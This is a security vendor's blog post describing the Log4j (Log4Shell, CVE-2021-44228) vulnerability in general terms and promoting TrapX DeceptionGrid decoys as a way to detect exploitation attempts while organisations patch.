Using DeceptionGrid to Detect and Defeat Exploits of Log4j Remote Code Execution (RCE) Vulnerability
Just two weeks ago, in Deception – A Shield Between Vulnerability Disclosure and Patch Deployment: The Case of CVE-2021-22005, we discussed the case of a vCenter vulnerability and how to mitigate it with TrapX DeceptionGrid. Only eight days later, on December 9th, 2021, a critical vulnerability in Log4J (known also as Log4Shell), the popular Java-based logging package, was publicly disclosed: CVE-2021-44228 .
Apache Log4j2 JNDI features, that are used in configuration, log messages, and parameters, do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
A significant number of Java-based applications use log4j as their logging utility and are exposed to this vulnerability.
Exploit code for this vulnerability has been made publicly available and according to Symantec, and exploitation attempts have already been detected in the wild.
Impact on TrapX DeceptionGrid
DeceptionGrid, including all versions of all product components, is not susceptible to the log4j vulnerability.
How can TrapX DeceptionGrid help ?
TrapX DeceptionGrid can provide early detection alerts, enabling response to cybercriminals attempting to exploit the Log4j vulnerability.
Log4j affects millions of devices and applications worldwide. One of the biggest challenges for organizations is to map and explore all applications and devices, used in house or in the cloud, that utilize Log4j, and to address the risk to each one of them. This process of exploring and identifying all applications and devices that are vulnerable to Log4j can take some time, and in some situations organizations may mistakenly skip or miss some unpatched applications or devices. Moreover, the process of patch deployments and updates requires a significant amount of time in large organizations.
With DeceptionGrid, we significantly reduce threat risk to organizations during this period of mapping ,exploring and patching, by enabling our customers to easily create as many decoy traps as they want across their networks.
Both in internal and in external DMZ zones, TrapX DeceptionGrid decoys can alert upon any attempt to exploit the vulnerability in your network. Optionally, with our eco-system integrations, DeceptionGrid can automatically provide remediation.
Below is a preview of our upcoming release, which, when attackers exploit this vulnerability or others displays an explicit indication that the attacker is attempting to exploit the Log4j vulnerability. The alert reveals the attacker IP address, host name, and exploit commands:
In today’s world, security teams must take immediate action and patch all relevant applications and devices in the organization. They also have to address their risk exposure duing patching cycles with active defense techniques such as offered by TrapX DeceptionGrid. With such techniques you can gain time, optimizing your handling of threat risks in your organization, while patching relevant applications and devices affected by this and other vulnerabilities. Increase your organization’s early detection capabilities, and reduce the chances of being breached by these and other exploits.
About TrapX Security
TrapX provides a new generation of Deception technology that provides real-time breach detection and prevention. Our proven solutions immerse tangible IT assets in a virtual minefield of traps that misinform and misdirect would-be attackers, alerting SOC teams to malicious activity with immediate, actionable intelligence. Our solutions enable our customers to isolate, fingerprint rapidly and disable new Zero-Day attacks and APTs in real-time. TrapX Security has thousands of government and Global 2000 users worldwide, servicing customers in manufacturing, defense, healthcare, finance, energy, consumer products, and other vital industries. For more information, visit www.trapx.com.